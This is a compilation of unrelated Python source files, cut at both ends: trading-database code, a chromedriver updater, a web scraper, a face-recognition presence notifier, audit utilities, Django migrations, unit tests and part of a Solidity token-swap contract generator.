QLambdaTable(actions=list(range(env.n_actions))) env.after(100, update) env.mainloop()
python
from abc import ABC, abstractmethod from datetime import datetime from typing import List from dateutil.tz import tz from pytz import timezone from dataclasses import dataclass from importlib import import_module from .constant import Interval, Exchange from .object import BarData, TickData from .setting import SETTINGS DB_TZ = timezone(SETTINGS["database.timezone"]) # use this tz in datetime tzinfo, remove 6min problem DATETIME_TZ = tz.gettz('Asia/Shanghai') def convert_tz(dt: datetime) -> datetime: """ Convert timezone of datetime object to DB_TZ. """ dt = dt.astimezone(DB_TZ) return dt.replace(tzinfo=None) @dataclass class BarOverview: """ Overview of bar data stored in database. """ symbol: str = "" exchange: Exchange = None interval: Interval = None count: int = 0 start: datetime = None end: datetime = None class BaseDatabase(ABC): """ Abstract database class for connecting to different database. """ @abstractmethod def save_bar_data(self, bars: List[BarData]) -> bool: """ Save bar data into database. """ pass @abstractmethod def save_tick_data(self, ticks: List[TickData]) -> bool: """ Save tick data into database. """ pass @abstractmethod def load_bar_data( self, symbol: str, exchange: Exchange, interval: Interval, start: datetime, end: datetime ) -> List[BarData]: """ Load bar data from database. """ pass @abstractmethod def load_tick_data( self, symbol: str, exchange: Exchange, start: datetime, end: datetime ) -> List[TickData]: """ Load tick data from database. """ pass @abstractmethod def delete_bar_data( self, symbol: str, exchange: Exchange, interval: Interval ) -> int: """ Delete all bar data with given symbol + exchange + interval. """ pass @abstractmethod def delete_tick_data( self, symbol: str, exchange: Exchange ) -> int: """ Delete all tick data with given symbol + exchange. """ pass @abstractmethod def get_bar_overview(self) -> List[BarOverview]: """ Return data avaible in database. """ pass database: BaseDatabase = None def get_database() -> BaseDatabase: """""" # Return database object if already inited global database if database: return database # Read database related global setting database_name: str = SETTINGS["database.name"] module_name: str = f"vnpy_{database_name}" # Try to import database module try: module = import_module(module_name) except ModuleNotFoundError: print(f"找不到数据库驱动{module_name},使用默认的SQLite数据库") module = import_module("vnpy_sqlite") # Create database object from module database = module.Database() return database
python
import os import requests import subprocess import wget import zipfile def download_latest_version(version_number, driver_directory): """Download latest version of chromedriver to a specified directory. :param driver_directory: Directory to save and download chromedriver.exe into. :type driver_directory: str :param version_number: Latest chromedriver release from chromedriver.storage.googleapis.com. :type version_number: str :return: None """ print("Attempting to download latest driver online......") download_url = "https://chromedriver.storage.googleapis.com/" + version_number + "/chromedriver_win32.zip" print(download_url) # Download driver as a zip file to specified folder latest_driver_zip = wget.download(download_url, out=driver_directory) # Read zip file with zipfile.ZipFile(latest_driver_zip, 'r') as downloaded_zip: # Extract contents from downloaded zip file to specified folder path downloaded_zip.extractall(path=driver_directory) print(f"\nSuccessfully downloaded version {version_number} to:\n{driver_directory}") # Delete the zip file downloaded os.remove(latest_driver_zip) return def check_driver(driver_directory): """Check local chromedriver version and compare it with latest available version online. :param driver_directory: Directory to store chromedriver.exe. Required to add driver_directory to path before using. :type driver_directory: str :return: True if chromedriver.exe is already in driver_directory, else chromedriver is automatically downloaded. """ # Check for latest chromedriver version online latest_release_url = "https://chromedriver.storage.googleapis.com/LATEST_RELEASE" response = requests.get(latest_release_url) online_driver_version = response.text try: # Executes cmd line entry to check for existing web-driver version locally cmd_run = subprocess.run("chromedriver --version", capture_output=True, text=True) except FileNotFoundError: # Handling case if chromedriver not found in path print("No chromedriver.exe found in specified path\n") download_latest_version(online_driver_version, driver_directory) else: # Extract local driver version number as string from terminal output local_driver_version = cmd_run.stdout.split()[1] print(f"Local chromedriver version: {local_driver_version}") print(f"Latest online chromedriver version: {online_driver_version}") if local_driver_version == online_driver_version: return True else: download_latest_version(online_driver_version, driver_directory)
python
""" Given an array, return the max difference between 2 numbers in array whereby: - larger number is after smaller number in array order eg: [0, 1, 12] -> 12 eg: [12, 0, 1] -> 1 """ def maxDiff(arr, n): # Initialize Result maxDiff = -1 # Initialize max element from # right side maxRight = arr[n - 1] for i in range(n - 2, -1, -1): if arr[i] > maxRight: maxRight = arr[i] else: diff = maxRight - arr[i] if diff > maxDiff: maxDiff = diff return maxDiff
python
from datetime import datetime import dill as pickle from pathlib import Path from copy import deepcopy import numpy as np from skimage.io import imread import GPnd from GPnd import * from plotting import MAP_Estimator if __name__=='__main__': f_path = Path('chains/2019-09-22T16-01-08_n100000.pkl') with open(f_path, 'rb') as f: chain = pickle.load(f) image_path = Path('data/head.png') image = dataLoading.import_image(image_path, size=chain.size) data = chain.T(image) fbp = chain.T.inv(data) print(f_path) print( 'Data Shape: %s\n'%(data.shape,), 'L_2 Errors: \n', ' Filtered Back projections: %s\n'%(np.linalg.norm(fbp-image)/np.product(image.shape),), ' MCMC Reconstruction: %s\n'%(np.linalg.norm(chain.reconstruction-image)/np.product(image.shape)), )
python
# encoding=utf8 # pylint: disable=line-too-long """Implementation of modified nature-inspired algorithms.""" from NiaPy.algorithms.modified.hba import HybridBatAlgorithm from NiaPy.algorithms.modified.hde import DifferentialEvolutionMTS, DifferentialEvolutionMTSv1, DynNpDifferentialEvolutionMTS, DynNpDifferentialEvolutionMTSv1, MultiStratgyDifferentialEvolutionMTS, DynNpMultiStrategyDifferentialEvolutionMTS, DynNpMultiStrategyDifferentialEvolutionMTSv1, MultiStratgyDifferentialEvolutionMTSv1 from NiaPy.algorithms.modified.jde import SelfAdaptiveDifferentialEvolution, DynNpSelfAdaptiveDifferentialEvolutionAlgorithm, MultiStrategySelfAdaptiveDifferentialEvolution, DynNpMultiStrategySelfAdaptiveDifferentialEvolution __all__ = [ 'HybridBatAlgorithm', 'DifferentialEvolutionMTS', 'DifferentialEvolutionMTSv1', 'DynNpDifferentialEvolutionMTS', 'DynNpDifferentialEvolutionMTSv1', 'MultiStratgyDifferentialEvolutionMTS', 'MultiStratgyDifferentialEvolutionMTSv1', 'DynNpMultiStrategyDifferentialEvolutionMTS', 'DynNpMultiStrategyDifferentialEvolutionMTSv1', 'SelfAdaptiveDifferentialEvolution', 'DynNpSelfAdaptiveDifferentialEvolutionAlgorithm', 'MultiStrategySelfAdaptiveDifferentialEvolution', 'DynNpMultiStrategySelfAdaptiveDifferentialEvolution' ]
python
from __future__ import annotations from typing import Any, TypeVar, cast from discord.ext import typed_commands C = TypeVar('C', bound='Cog[Any]') CT = TypeVar('CT', bound=typed_commands.Context) class Cog(typed_commands.Cog[CT]): def _inject(self: C, bot: typed_commands.Bot[CT], /) -> C: self.__pre_inject__(bot) cog: C = cast(Any, super())._inject(bot) self.__post_inject__(bot) return cog def _eject(self, bot: typed_commands.Bot[CT], /) -> None: self.__pre_eject__(bot) cast(Any, super())._eject(bot) self.__post_eject__(bot) def __pre_inject__(self, bot: typed_commands.Bot[CT], /) -> None: ... def __post_inject__(self, bot: typed_commands.Bot[CT], /) -> None: ... def __pre_eject__(self, bot: typed_commands.Bot[CT], /) -> None: ... def __post_eject__(self, bot: typed_commands.Bot[CT], /) -> None: ...
python
import xlrd import csv def Excel2CSV(ExcelFile='SicCodesAllLevels.xls', SheetName='SIC4', CSVFile='ref_list.csv'): workbook = xlrd.open_workbook(ExcelFile) worksheet = workbook.sheet_by_name(SheetName) csvfile = open(CSVFile, 'wb') wr = csv.writer(csvfile, quoting=csv.QUOTE_ALL) for rownum in xrange(worksheet.nrows): wr.writerow( list(x.encode('utf-8') for x in worksheet.row_values(rownum))) csvfile.close() Excel2CSV()
python
import numpy as np import os class Lay(object): def __init__(self): self.__m = self.m_world = None self.__r = self.m_world = None self.__s = self.m_world = None self.m_world = None self.m_world_inv = None self.is_ready = False def set(self, move=np.eye(4), rotate=np.eye(4), scale=np.eye(4)): if type(move) != np.ndarray or move.shape != (4, 4): raise Exception('Parameter `move` must be 4x4 numpy.ndarray') if type(rotate) != np.ndarray or rotate.shape != (4, 4): raise Exception('Parameter `rotate` must be 4x4 numpy.ndarray.') if type(scale) != np.ndarray or scale.shape != (4, 4): raise Exception('Parameter `scale` must or 4x4 numpy.ndarray') self.__m = move self.__r = rotate self.__s = scale self.__calculate() def set_by_file(self, file_path): # read file with open(os.path.split(os.path.realpath(__file__))[0] + os.sep + file_path) as file: line_list = file.readlines() for line in line_list: line_split = line.split() if len(line_split) <= 0: continue elif line_split[0] == 'move': self.__m = np.array([ [float(line_split[1]), float(line_split[2]), float(line_split[3]), float(line_split[4])], [float(line_split[5]), float(line_split[6]), float(line_split[7]), float(line_split[8])], [float(line_split[9]), float(line_split[10]), float(line_split[11]), float(line_split[12])], [float(line_split[13]), float(line_split[14]), float(line_split[15]), float(line_split[16])], ]) elif line_split[0] == 'rotate': self.__r = np.array([ [float(line_split[1]), float(line_split[2]), float(line_split[3]), float(line_split[4])], [float(line_split[5]), float(line_split[6]), float(line_split[7]), float(line_split[8])], [float(line_split[9]), float(line_split[10]), float(line_split[11]), float(line_split[12])], [float(line_split[13]), float(line_split[14]), float(line_split[15]), float(line_split[16])], ]) elif line_split[0] == 'scale': self.__s = np.array([ [float(line_split[1]), float(line_split[2]), float(line_split[3]), float(line_split[4])], [float(line_split[5]), float(line_split[6]), float(line_split[7]), float(line_split[8])], [float(line_split[9]), float(line_split[10]), float(line_split[11]), float(line_split[12])], [float(line_split[13]), float(line_split[14]), float(line_split[15]), float(line_split[16])], ]) self.__calculate() def __calculate(self): self.m_world = np.dot(np.dot(self.__m, self.__r), self.__s) self.m_world_inv = np.linalg.inv(self.m_world) self.is_ready = True
python
"""Class instance for Transformer """ import argparse # pylint: disable=unused-argument class Transformer(): """Generic class for supporting transformers """ def __init__(self, **kwargs): """Performs initialization of class instance Arguments: kwargs: additional parameters passed into Transformer instance """ self.args = None def add_parameters(self, parser: argparse.ArgumentParser) -> None: """Adds processing parameters to existing parameters Arguments: parser: instance of argparse """ # pylint: disable=no-self-use def get_transformer_params(self, args: argparse.Namespace, metadata: list) -> dict: """Returns a parameter list for processing data Arguments: args: result of calling argparse.parse_args metadata: the list of loaded metadata Return: A dictionary of parameter names and value to pass to transformer """ self.args = args params = {} return params # pylint: disable=no-self-use def retrieve_files(self, transformer_params: dict, metadata: list) -> tuple: """Retrieves files as needed to make them available for processing Arguments: transformer_params: the values returned from get_transformer_params() call metadata: the loaded metadata Return: A tuple consisting of the return code and an optional error message. Notes: A negative return code is considered an error and an associated message, if specified, will be treated as such. """ return 0, "everything's in order"
python
#!/usr/bin/python3 # -*- coding: utf-8 -*- import sys from PySide2 import QtCore, QtGui, QtWidgets class GraphicView(QtWidgets.QGraphicsView): def __init__(self): QtWidgets.QGraphicsView.__init__(self) self.setWindowTitle("QGraphicsView") scene = QtWidgets.QGraphicsScene(self) scene.setSceneRect(0, 0, 160, 120) self.setScene(scene) line = QtCore.QLineF(10,10,100,100) node = QtWidgets.QGraphicsLineItem(line) scene.addItem(node) if __name__ == "__main__": app = QtWidgets.QApplication(sys.argv) widget = GraphicView() widget.show() sys.exit(app.exec_())
python
# Generated by Django 3.2.7 on 2021-09-27 15:01 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('rgd_fmv', '0001_initial'), ] operations = [ migrations.AlterField( model_name='fmv', name='status', field=models.CharField( choices=[ ('created', 'Created but not queued'), ('queued', 'Queued for processing'), ('running', 'Processing'), ('failed', 'Failed'), ('success', 'Succeeded'), ('skipped', 'Skipped'), ], default='created', max_length=20, ), ), ]
python
from bs4 import BeautifulSoup import requests import re from graph import Graph from player import Player class Crawler: def __init__(self,link_root=""): self.link_root = "https://www.hltv.org/stats/teams" self.headers = {} self.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KH TML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" self.headers["Refer"] = "https://www.hltv.org/stats/teams" self.grafo = Graph() def get_page(self, link): return requests.get(link,headers=self.headers) def walk_teams(self): page = self.get_page(self.link_root) soup = BeautifulSoup(page.text, 'html.parser') for team in soup.find_all("td", {"class":"teamCol-teams-overview"}): link_team = self.link_root + "/lineups/" + team.a['href'][13:] self.get_lineups(link_team) def get_lineups(self,link_team): page = self.get_page(link_team) soup = BeautifulSoup(page.text,'html.parser') for line in soup.find_all("div",{"class":"lineup-container"}): self.extract_players(line) def connect_lineup(self,list_players): for i in range(len(list_players)): list_players[i] = self.grafo.add_player(list_players[i]) for i in range(len(list_players) - 1) : for j in range( i + 1, len(list_players)): self.grafo.connect(list_players[i].identificador,list_players[j].identificador) def extract_players(self, line): line_player = [] for raw_player in line.find_all("div", {"class":"col teammate"}): p = Player() p.conexoes = [] p.foto = raw_player.img['src'] p.nome = re.match(r'/stats/players/\d+/(.+)',raw_player.div.a['href']).group(1) p.nacionalidade = raw_player.div.img['alt'] line_player.append(p) self.connect_lineup(line_player)
python
from flask_wtf import FlaskForm class NameForm(FlaskForm): pass
python
# coding: utf-8 """ MailSlurp API MailSlurp is an API for sending and receiving emails from dynamically allocated email addresses. It's designed for developers and QA teams to test applications, process inbound emails, send templated notifications, attachments, and more. ## Resources - [Homepage](https://www.mailslurp.com) - Get an [API KEY](https://app.mailslurp.com/sign-up/) - Generated [SDK Clients](https://www.mailslurp.com/docs/) - [Examples](https://github.com/mailslurp/examples) repository # noqa: E501 The version of the OpenAPI document: 6.5.2 Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import unittest import mailslurp_client from mailslurp_client.api.expired_controller_api import ExpiredControllerApi # noqa: E501 from mailslurp_client.rest import ApiException class TestExpiredControllerApi(unittest.TestCase): """ExpiredControllerApi unit test stubs""" def setUp(self): self.api = mailslurp_client.api.expired_controller_api.ExpiredControllerApi() # noqa: E501 def tearDown(self): pass def test_get_expiration_defaults(self): """Test case for get_expiration_defaults Get default expiration settings # noqa: E501 """ pass def test_get_expired_inbox_by_inbox_id(self): """Test case for get_expired_inbox_by_inbox_id Get expired inbox record for a previously existing inbox # noqa: E501 """ pass def test_get_expired_inbox_record(self): """Test case for get_expired_inbox_record Get an expired inbox record # noqa: E501 """ pass def test_get_expired_inboxes(self): """Test case for get_expired_inboxes List records of expired inboxes # noqa: E501 """ pass if __name__ == '__main__': unittest.main()
python
"""""" import pytest import random import tempfile from textwrap import dedent from unittest import mock from pybryt.utils import * from .test_reference import generate_reference_notebook def test_filter_picklable_list(): """ """ l = [1, 2, 3] filter_picklable_list(l) assert len(l) == 3 with mock.patch("dill.dumps") as mocked_dill: mocked_dill.side_effect = Exception() filter_picklable_list(l) assert len(l) == 0 def test_notebook_to_string(): """ """ ref = generate_reference_notebook() s = notebook_to_string(ref) assert s.strip() == dedent("""\ import pybryt def median(S): sorted_S = sorted(S) pybryt.Value(sorted_S, name="sorted", group="median", limit=5, success_message="SUCCESS: Sorted the sample correctly", failure_message="ERROR: The sample was not sorted") size_of_set = len(S) pybryt.Value(size_of_set, name="size", group="median", success_message = "SUCCESS: Computed the size of the sample", failure_message="ERROR: Did not capture the size of the set to determine if it is odd or even") middle = size_of_set // 2 is_set_size_even = (size_of_set % 2) == 0 if is_set_size_even: return (sorted_S[middle-1] + sorted_S[middle]) / 2 else: return sorted_S[middle] import numpy as np np.random.seed(42) for _ in range(10): vals = [np.random.randint(-1000, 1000) for _ in range(np.random.randint(1, 1000))] val = median(vals) pybryt.Value(val, name="median", group="median", success_message="SUCCESS: computed the correct median", failure_message="ERROR: failed to compute the median") """).strip() with pytest.raises(TypeError, match="invalid notebook type"): notebook_to_string(1) def test_make_secret(): """ """ random.seed(42) s = make_secret() print(s) assert s == "HBRPOI" def test_save_notebook(): """ """ with mock.patch("pybryt.utils.get_ipython") as mocked_get: with mock.patch("pybryt.utils.publish_display_data") as mocked_pub: mocked_get.return_value = True with tempfile.NamedTemporaryFile(suffix=".ipynb") as ntf: v = save_notebook(ntf.name, timeout=1) mocked_pub.assert_called() assert not v
python
#!/usr/bin/env python # -*- encoding: utf-8 -*- ''' @文件 :audit_utils.py @说明 : @时间 :2020/07/21 16:38:22 @作者 :Riven @版本 :1.0.0 ''' import base64, logging, socket, sys sys.path.append('.') from app_server.src.utils.collection_utils import get_first_existing from app_server.src.utils.tornado_utils import get_proxied_ip HOSTNAME = 'hostname' IP = 'ip' PROXIED_USERNAME = 'proxied_username' PROXIED_IP = 'proxied_ip' PROXIED_HOSTNAME = 'proxied_hostname' AUTH_USERNAME = 'auth_username' LOGGER = logging.getLogger('script_server.audit_utils') def get_all_audit_names(request_handler): result = {} auth_username = request_handler.application.identification.identify_for_audit(request_handler) if auth_username: result[AUTH_USERNAME] = auth_username basic_auth_username = find_basic_auth_username(request_handler) if basic_auth_username: result[PROXIED_USERNAME] = basic_auth_username proxied_ip = get_proxied_ip(request_handler) if proxied_ip: result[proxied_ip] = proxied_ip proxied_hostname = _resolve_hostname(proxied_ip) if proxied_hostname: result[PROXIED_HOSTNAME] = proxied_hostname remote_ip = request_handler.request.remote_ip result[IP] = remote_ip hostname = _resolve_hostname(remote_ip) if hostname: result[HOSTNAME] = hostname return result def _resolve_hostname(ip): try: (hostname, _, _) = socket.gethostbyaddr(ip) return hostname except: LOGGER.warning('Could not get hostname for' + ip) return None def get_audit_name(all_audit_names): audit_types = [AUTH_USERNAME, PROXIED_USERNAME, PROXIED_HOSTNAME, PROXIED_IP, HOSTNAME, IP] for name_type in audit_types: name = all_audit_names.get(name_type) if name: return name return None def get_audit_name_from_request(request_handler): audit_names = get_all_audit_names(request_handler) return get_audit_name(audit_names) def find_basic_auth_username(request_handler): auth_header = request_handler.request.headers.get('Authorization') if (auth_header is None) or (not auth_header.lower().startswith('basic')): return None encoding = sys.getdefaultencoding() credential_bytes = base64.b64decode(auth_header[6:]) credentials = credential_bytes.decode(encoding) username = credentials.split(':')[0] return username def get_audit_username(all_audit_names): return get_first_existing(all_audit_names, AUTH_USERNAME, PROXIED_USERNAME) if __name__ == '__main__': print(__file__)
python
#!/home/jeffmur/archiconda3/envs/face_recon/bin/python3 import face_recognition import cv2 import numpy as np import pickle from pathlib import Path from datetime import datetime import signal,sys,time from google.cloud import pubsub_v1 # TODO (developer config) project_id = "{GOOGLE_CLOUD_PROJECT_ID}" topic_id = "{GOOGLE_PUB_SUB_ENDPOINT}" # end config publisher = pubsub_v1.PublisherClient() topic_path = publisher.topic_path(project_id, topic_id) minDelta = 3 # seconds between publish events class User: # Initaliziation def __init__(self, name, picturePath): self.active = False self.name = name self.picture = picturePath self.postTime = datetime.now() def publishStatus(self): if(self.active): print(f"[{datetime.now()}] -- {self.name} Detected") else: print(f"[{datetime.now()}] -- {self.name} Left") # Else publish event status = "ACTIVE" if self.active else "LEFT" data = f"{self.name}-{status}" #, self.keyIter) # Data must be a bytestring data = data.encode("utf-8") # Add two attributes, origin and username, to the message publisher.publish( topic_path, data, update=status, user=str(self.name) ) def updateStatus(self, isThere): # Only send data every {delta} seconds current_time = datetime.now() diff = current_time - self.postTime total = diff.total_seconds() if(total <= minDelta): return self.postTime = current_time if(self.active != isThere): self.active = isThere self.publishStatus() def newEncoding(self): p = Path(f"{self.name}_face.dat") if(not p.exists()): # Load a sample picture and learn how to recognize it. user_image = face_recognition.load_image_file(self.picture) try: user_face_encoding = face_recognition.face_encodings(user_image)[0] except IndexError as error: raise "No Face Recognized, please supply a higher resolution image!" with open(f"{self.name}_face.dat", "wb") as face_data_file: pickle.dump(user_face_encoding, face_data_file) print(f"{self.name} face saved to disk.") return user_face_encoding else: print(f"Loading {self.name} face from cache") self.loadEncoding() def loadEncoding(self): try: with open(f"{self.name}_face.dat", "rb") as face_data_file: user_face_encoding = pickle.load(face_data_file) print(f"Success! -- Loaded {self.name}") return user_face_encoding except FileNotFoundError as e: print("No previous face data found - saving a new face!") return self.newEncoding() # Get a reference to webcam #0 (the default one) video_capture = cv2.VideoCapture(0) ## Images and Names # TODO: Users and local encodings known_users = [User("Bob", "path/to/Bob.jpg"), User("Alice", "path/to/Alice.jpg"), User("Kevin", "path/to/Kevin.jpg")] # Create arrays of known face encodings and their names known_face_encodings = [x.loadEncoding() for x in known_users] known_face_names = [x.name for x in known_users] # Initialize some variables face_locations = [] face_encodings = [] face_names = [] process_this_frame = True # Graceful exist terminate = False def signal_handling(signum,frame): global terminate terminate = True print("Ready") while True: signal.signal(signal.SIGINT,signal_handling) if terminate: print('\n') video_capture.release() break # Grab a single frame of video ret, frame = video_capture.read() # Resize frame of video to 1/4 size for faster face recognition processing small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25) # Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses) rgb_small_frame = small_frame[:, :, ::-1] # Only process every other frame of video to save time if process_this_frame: # Find all the faces and face encodings in the current frame of video face_locations = face_recognition.face_locations(rgb_small_frame) face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations) # "Leaving" if face is not detected, set all status to false if(face_encodings == []): for user in known_users: user.updateStatus(False) face_names = [] for face_encoding in face_encodings: # See if the face is a match for the known face(s) matches = face_recognition.compare_faces(known_face_encodings, face_encoding) name = "Unknown" if(np.any(matches)): # Use the known face with the smallest distance to the new face face_distances = face_recognition.face_distance(known_face_encodings, face_encoding) best_match_index = np.argmin(face_distances) if matches[best_match_index]: name = known_face_names[best_match_index] for u in known_users: if(name == u.name): u.updateStatus(True) face_names.append(name) process_this_frame = not process_this_frame # Display the results - Testing # for (top, right, bottom, left), name in zip(face_locations, face_names): # # Scale back up face locations since the frame we detected in was scaled to 1/4 size # top *= 4 # right *= 4 # bottom *= 4 # left *= 4 # # Draw a box around the face # cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2) # # Draw a label with a name below the face # cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED) # font = cv2.FONT_HERSHEY_DUPLEX # cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1) # # Display the resulting image # cv2.imshow('Video', frame) # # Hit 'q' on the keyboard to quit! # if cv2.waitKey(1) & 0xFF == ord('q'): # break # Release handle to the webcam # cv2.destroyAllWindows()
python
from eeval.evaluator import evaluate from math import pi import timeit exprs = ( "2+2*2", "(2+2)+(2+2)", "-(2+2)+(-(2+2))", "(2+2)*(-(2+2))", "-(-(-(-(3*88888))))", "pi*2", "(pi+1)*(pi+2)", "-pi", "pi^2" ) constants = { "pi": pi } itercount = 1000 print("Evaluator test:") for expr in exprs: print(expr, "=", evaluate(expr, constants=constants), "timeit: ", end="", flush=True) print(timeit.timeit("e(expr, constants=c)", globals={ "e": evaluate, "expr": expr, "c": constants}, number=itercount))
python
from typing import Dict from smartz.api.constructor_engine import ConstructorInstance def is_true(arr, key): return key in arr and bool(arr[key]) class Constructor(ConstructorInstance): _SWAP_TYPE_ETHER = 'Ether' _SWAP_TYPE_TOKENS = 'ERC20 tokens' def __init__(self): self._TEMPLATES: Dict[str, str] = { self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER, self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS } self._CHECK_TRANSFER1: Dict[str, str] = { self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER1, self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER1 } self._CHECK_TRANSFER2: Dict[str, str] = { self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER2, self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER2 } def get_version(self): return { "result": "success", "version": 1 } def get_params(self): json_schema = { "type": "object", "required": ["participant1", "participant2"], "additionalProperties": False, "properties": { "participant1": { "type": "object", "title": "Participant #1", "required": ["token", "count"], "properties": { "use_my_address": { "type": "boolean", "title": "Use my address", "description": "Deployer's address would be got as participant #1 address", "default": True }, "token": { "title": "Token address", "description": "Address of ERC20 token smart contract, which participant #1 will swap", "$ref": "#/definitions/address" }, "count": { "title": "Tokens count", "description": "Tokens count, which participant #1 will swap for participant #2 tokens/ether. Token decimals must be <= 18", "type": "string", "pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$" } }, "dependencies": { "use_my_address": { "oneOf": [ { "properties": { "use_my_address": { "enum": [ True ] }, }, }, { "properties": { "use_my_address": { "enum": [ False ] }, "address": { "title": "Address", "description": "Address where tokens/ether from participant #2 will be sent", "$ref": "#/definitions/address" }, }, "required": [ "address" ] } ] } } }, "participant2": { "type": "object", "title": "Participant #2", "required": ["swap_type"], "properties": { "swap_type": { "title": "Swap type", "description": "Swap tokens of participant #1 for participant's #2:", "type": "string", "enum": [ self._SWAP_TYPE_ETHER, self._SWAP_TYPE_TOKENS ], "default": self._SWAP_TYPE_ETHER }, "use_my_address": { "type": "boolean", "title": "Use my address", "description": "Deployer's address would be got as participant #1 address", "default": False }, }, "dependencies": { "use_my_address": { "oneOf": [ { "properties": { "use_my_address": { "enum": [ True ] }, }, }, { "properties": { "use_my_address": { "enum": [ False ], }, "address": { "title": "Address", "description": "Address where tokens/ether from participant #1 will be sent", "$ref": "#/definitions/address" }, }, "required": [ "address" ] } ] }, "swap_type": { "oneOf": [ { "properties": { "swap_type": { "enum": [ self._SWAP_TYPE_ETHER ] }, "count": { "title": "Ether count", "description": "Ether count, which participant #2 will swap for participant #2 tokens", "type": "string", "pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$" } }, "required": [ "count" ] }, { "properties": { "swap_type": { "enum": [ self._SWAP_TYPE_TOKENS ] }, "token": { "title": "Token address", "description": "Address of ERC20 token smart contract, which participant #2 will swap", "$ref": "#/definitions/address" }, "count": { "title": "Tokens count", "description": "Tokens count, which participant #2 will swap for participant #1 tokens. . Token decimals must be <= 18", "type": "string", "pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$" } }, "required": [ "token", "count" ] } ] } } }, "check_transfers": { "type": "boolean", "title": "Verify token transfers", "description": "Verify that token balances of participants after swap are greater for the amount of transfer (or more). If not, the transaction will be canceled.", "default": True }, } } ui_schema = { "participant1": { "ui:order": ["*", "token", "count"], }, "participant2": { "swap_type": { "ui:widget": "radio", } } } return { "result": "success", "schema": json_schema, "ui_schema": ui_schema } def construct(self, fields): swap_type = fields['participant2']['swap_type'] part1 = fields['participant1'] part2 = fields['participant2'] errors = self._check_errors(part1, part2, swap_type) if errors: return { "result": "error", "errors": errors } source = self._TEMPLATES[swap_type] source = self._fill_check_transfers_dependant_vars(fields, source, swap_type) source = self._fill_main_vars(part1, part2, source) source = self._fill_swap_type_dependant_vars(part2, source, swap_type) return { "result": "success", 'source': source, 'contract_name': "Swap" } def post_construct(self, fields, abi_array): if fields['participant2']['swap_type'] == self._SWAP_TYPE_ETHER: part2_type = 'ether' else: part2_type = 'tokens' function_titles = { 'isFinished': { 'title': 'Is finished?', 'description': 'is swap finished', 'sorting_order': 10 }, 'participant1': { 'title': 'Participant #1', 'description': 'Address of participant #1', 'sorting_order': 20 }, "participant1Token": { "title": "Token address of participant #1", "description": "Address of ERC20 token smart contract, which participant #1 will swap", 'sorting_order': 30 }, "participant1TokensCount": { "title": "Tokens count of participant #1 (in token wei)", "description": "Tokens count, which participant #1 will swap for participant #2 tokens/ether (in token wei)", 'sorting_order': 40 }, "participant1SentTokensCount": { "title": "Tokens count sent by participant #1 (in token wei)", "description": "Tokens count, which participant #1 has already sent (in token wei)", 'sorting_order': 50 }, 'participant2': { 'title': 'Participant #2', 'description': 'Address of participant #2', 'sorting_order': 60 }, 'swap': { 'title': 'Swap', 'description': 'Swap tokens of participant #1 to {} of participant #2'.format(part2_type), 'sorting_order': 100 }, 'refund': { 'title': 'Refund', 'description': 'Refund tokens/ether to participants', 'sorting_order': 110 }, } if fields['participant2']['swap_type'] == self._SWAP_TYPE_ETHER: function_titles["participant2EtherCount"] = { "title": "Ether count of participant #2 (in wei)", "description": "Ether count, which participant #1 will swap for participant #2 tokens (in wei)", 'sorting_order': 70 } function_titles["participant2SentEtherCount"] = { "title": "Ether count sent by participant #2 (in wei)", "description": "Ether count, which participant #2 has already sent (in wei)", 'sorting_order': 80 } else: function_titles["participant2Token"] = { "title": "Token address of participant #2", "description": "Address of ERC20 token smart contract, which participant #2 will swap", 'sorting_order': 70 } function_titles["participant2TokensCount"] = { "title": "Tokens count of participant #2 (in token wei)", "description": "Tokens count, which participant #2 will swap for participant #1 tokens (in token wei)", 'sorting_order': 80 } function_titles["participant2SentTokensCount"] = { "title": "Tokens count sent by participant #2 (in token wei)", "description": "Tokens count, which participant #2 has already sent (in token wei)", 'sorting_order': 90 } return { "result": "success", 'function_specs': function_titles, 'dashboard_functions': ['isFinished', 'participant1', 'participant2'] } def _check_errors(self, part1, part2, swap_type): """ Check additional errors""" errors = {} if "address" in part1 and "address" in part2 \ and part1['address'] == part2['address']: errors['participant1'] = { 'address': "Participants addresses must be different" } if is_true(part1, "use_my_address") and is_true(part2, "use_my_address"): errors['participant1'] = { 'use_my_address': "Participants addresses must be different" } if swap_type == self._SWAP_TYPE_TOKENS and part1['token'] == part2['token']: if 'participant1' not in errors: errors['participant1'] = {} errors['participant1']['token'] = "Tokens addresses must be different" return errors def _fill_swap_type_dependant_vars(self, part2, source, swap_type): if swap_type == self._SWAP_TYPE_ETHER: source = source \ .replace('%_participant2EtherCount%', str(part2['count'])) else: source = source \ .replace('%_participant2TokenAddress%', part2['token']) \ .replace('%_participant2TokensCount%', str(part2['count'])) return source def _fill_main_vars(self, part1, part2, source): part1_address = 'msg.sender' if is_true(part1, "use_my_address") else part1['address'] part2_address = 'msg.sender' if is_true(part2, "use_my_address") else part2['address'] source = source \ .replace('%erc20_basic%', self._TEMPLATE_ERC20) \ .replace('%_participant1%', part1_address) \ .replace('%_participant2%', part2_address) \ .replace('%_participant1TokenAddress%', part1['token']) \ .replace('%_participant1TokensCount%', str(part1['count'])) return source def _fill_check_transfers_dependant_vars(self, fields, 